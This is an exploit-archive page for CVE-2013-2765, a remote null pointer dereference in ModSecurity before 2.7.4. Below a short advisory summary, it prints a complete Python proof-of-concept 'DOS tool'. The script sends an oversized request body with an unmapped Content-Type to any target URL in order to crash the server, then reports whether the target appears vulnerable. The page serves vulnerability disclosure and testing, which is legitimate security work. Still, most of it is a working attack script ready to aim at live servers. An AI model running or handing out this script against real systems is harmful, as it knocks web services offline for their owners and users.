ModSecurity Remote Null Pointer Dereference

ModSecurity Remote Null Pointer Dereference: Posted May 29, 2013; Authored by Younes JAAIDI; When ModSecurity receives a request body with a size bigger than the value set by the "SecRequestBodyInMemoryLimit" and with a "Content-Type" that has no request body processor mapped to it, ModSecurity will systematically crash on every call to "forceRequestBodyVariable" (in phase 1). This is the proof of concept exploit. Versions prior to 2.7.4 are affected.; tags | exploit, proof of concept; advisories | CVE-2013-2765; SHA-256 | b4e14816e4c5cdc0de651f2cc750a97fa531e3a0c488cb71922a3bc534259845; Download | Favorite | View

ModSecurity Remote Null Pointer Dereference

#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#
# Created on Mar 29, 2013
#
# @author: Younes JAAIDI <yjaaidi@shookalabs.com>
#

import argparse
import http.client
import logging
import sys
import urllib.request

logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(sys.stderr))

class ModSecurityDOSCheck(object):

    _DEFAULT_REQUEST_BODY_SIZE = 200 # KB
    _DEFAULT_CONCURRENCY = 100
    _DEFAULT_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36"

    def __init__(self):
        self._request_counter = 0
        self._status_message = None

    def main(self, args_list):
        args_object = self._parse_args(args_list)
        
        payload = "A" * args_object.request_body_size * 1024
        
        request = urllib.request.Request(args_object.target_url,
                                         method = "GET",
                                         data = payload.encode('utf-8'),
                                         headers = {'Content-Type': 'text/random',
                                                    'User-Agent': self._DEFAULT_USER_AGENT})
        
        if self._send_request(request):
            logger.info("Target seems to be vulnerable!!!")
            return 0
        else:
            logger.info("Attack didn't work. Try increasing the 'REQUEST_BODY_SIZE'.")
            return 1

    def _parse_args(self, args_list):
        parser = argparse.ArgumentParser(description="ModSecurity DOS tool.")
        parser.add_argument('-t', '--target-url',
                            dest = 'target_url',
                            required = True,
                            help = "Target URL")
        parser.add_argument('-s', '--request-body-size',
                            dest = 'request_body_size',
                            default = self._DEFAULT_REQUEST_BODY_SIZE,
                            type = int,
                            help = "Request body size in KB")
        
        return parser.parse_args()

    def _send_request(self, request):
        try:
            urllib.request.urlopen(request)
            return False
        except (http.client.BadStatusLine, urllib.error.HTTPError):
            return True

if __name__ == '__main__':
    sys.exit(ModSecurityDOSCheck().main(sys.argv))

Top Authors In Last 30 Days

Red Hat 220 files
indoushka 88 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,098)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,715)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,486)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,742)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

ModSecurity Remote Null Pointer Dereference

ModSecurity Remote Null Pointer Dereference

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ModSecurity Remote Null Pointer Dereference

Share This

ModSecurity Remote Null Pointer Dereference

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems